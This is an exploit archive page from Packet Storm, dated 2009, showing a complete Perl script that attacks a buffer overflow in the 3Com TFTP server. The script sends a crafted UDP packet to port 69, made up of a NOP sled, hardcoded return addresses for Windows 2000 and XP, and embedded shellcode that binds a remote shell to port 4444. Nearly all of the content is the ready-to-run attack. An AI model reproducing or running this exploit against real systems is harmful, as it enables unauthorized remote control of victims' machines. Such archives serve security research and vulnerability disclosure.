what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

3COM TFTP Buffer Overflow

3COM TFTP Buffer Overflow
Posted Jan 14, 2009
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

3COM TFTP buffer overflow exploit that binds a shell to port 4444.

tags | exploit, overflow, shell
SHA-256 | 10a9bfc70432cab4c7496997dd07109c15d2e061794b60ef87be0e4f4ef1afd8
Download | Favorite | View

3COM TFTP Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
# 3com_tftp_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Easily owns ancient 3CTftpSvc.zip
# <JOKE!@#$% OK!@#$% JOKE!@#$%>
# Now how about a time machine and axx to 3com internal networks!
# </JOKE!@#$% OK!@#$% JOKE!@#$%>

use IO::Socket;

$win2ksp4  = 0x77E43292; # user32.dll JMP ESI
$winxpsp3  = 0x7E485184; # user32.dll JMP ESI
$test1234  = 0x41424344; # Debugging Purposes

       # Win32 Portbind Shellcode (pexfnstsub/metasploit,size=344,port=4444)
$shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x49".
       "\x35\x87\x48\x83\xeb\xfc\xe2\xf4\xb5\x5f\x6c\x05\xa1\xcc\x78\xb7".
       "\xb6\x55\x0c\x24\x6d\x11\x0c\x0d\x75\xbe\xfb\x4d\x31\x34\x68\xc3".
       "\x06\x2d\x0c\x17\x69\x34\x6c\x01\xc2\x01\x0c\x49\xa7\x04\x47\xd1".
       "\xe5\xb1\x47\x3c\x4e\xf4\x4d\x45\x48\xf7\x6c\xbc\x72\x61\xa3\x60".
       "\x3c\xd0\x0c\x17\x6d\x34\x6c\x2e\xc2\x39\xcc\xc3\x16\x29\x86\xa3".
       "\x4a\x19\x0c\xc1\x25\x11\x9b\x29\x8a\x04\x5c\x2c\xc2\x76\xb7\xc3".
       "\x09\x39\x0c\x38\x55\x98\x0c\x08\x41\x6b\xef\xc6\x07\x3b\x6b\x18".
       "\xb6\xe3\xe1\x1b\x2f\x5d\xb4\x7a\x21\x42\xf4\x7a\x16\x61\x78\x98".
       "\x21\xfe\x6a\xb4\x72\x65\x78\x9e\x16\xbc\x62\x2e\xc8\xd8\x8f\x4a".
       "\x1c\x5f\x85\xb7\x99\x5d\x5e\x41\xbc\x98\xd0\xb7\x9f\x66\xd4\x1b".
       "\x1a\x66\xc4\x1b\x0a\x66\x78\x98\x2f\x5d\x96\x14\x2f\x66\x0e\xa9".
       "\xdc\x5d\x23\x52\x39\xf2\xd0\xb7\x9f\x5f\x97\x19\x1c\xca\x57\x20".
       "\xed\x98\xa9\xa1\x1e\xca\x51\x1b\x1c\xca\x57\x20\xac\x7c\x01\x01".
       "\x1e\xca\x51\x18\x1d\x61\xd2\xb7\x99\xa6\xef\xaf\x30\xf3\xfe\x1f".
       "\xb6\xe3\xd2\xb7\x99\x53\xed\x2c\x2f\x5d\xe4\x25\xc0\xd0\xed\x18".
       "\x10\x1c\x4b\xc1\xae\x5f\xc3\xc1\xab\x04\x47\xbb\xe3\xcb\xc5\x65".
       "\xb7\x77\xab\xdb\xc4\x4f\xbf\xe3\xe2\x9e\xef\x3a\xb7\x86\x91\xb7".
       "\x3c\x71\x78\x9e\x12\x62\xd5\x19\x18\x64\xed\x49\x18\x64\xd2\x19".
       "\xb6\xe5\xef\xe5\x90\x30\x49\x1b\xb6\xe3\xed\xb7\xb6\x02\x78\x98".
       "\xc2\x62\x7b\xcb\x8d\x51\x78\x9e\x1b\xca\x57\x20\xb9\xbf\x83\x17".
       "\x1a\xca\x51\xb7\x99\x35\x87\x48";

$target    = $ARGV[0];
$os        = $ARGV[1];

if(!defined($target) || !defined($os))
{

     print "Usage: $0 <1.2.3.4> [1=win2ksp4/2=winxpsp3/3=test1234]\n";

}

if($os == "1") { $retaddr = pack('l', $win2ksp4); }
if($os == "2") { $retaddr = pack('l', $winxpsp3); }
if($os == "3") { $retaddr = pack('l', $test1234); }

# [packet]   write      filename  start mode    start our payload (transport mode name)
$payload = "\x00\x02" . "roffles" . "\x00" . "\x90" x 129 . $shellcode . $retaddr . "\x00"; # 129 + 344 + 4 = 477

$sock = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$target, PeerPort=>'69') or die "Error: $target/69\n";

     print $sock $payload;
     close($sock);

exit;
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close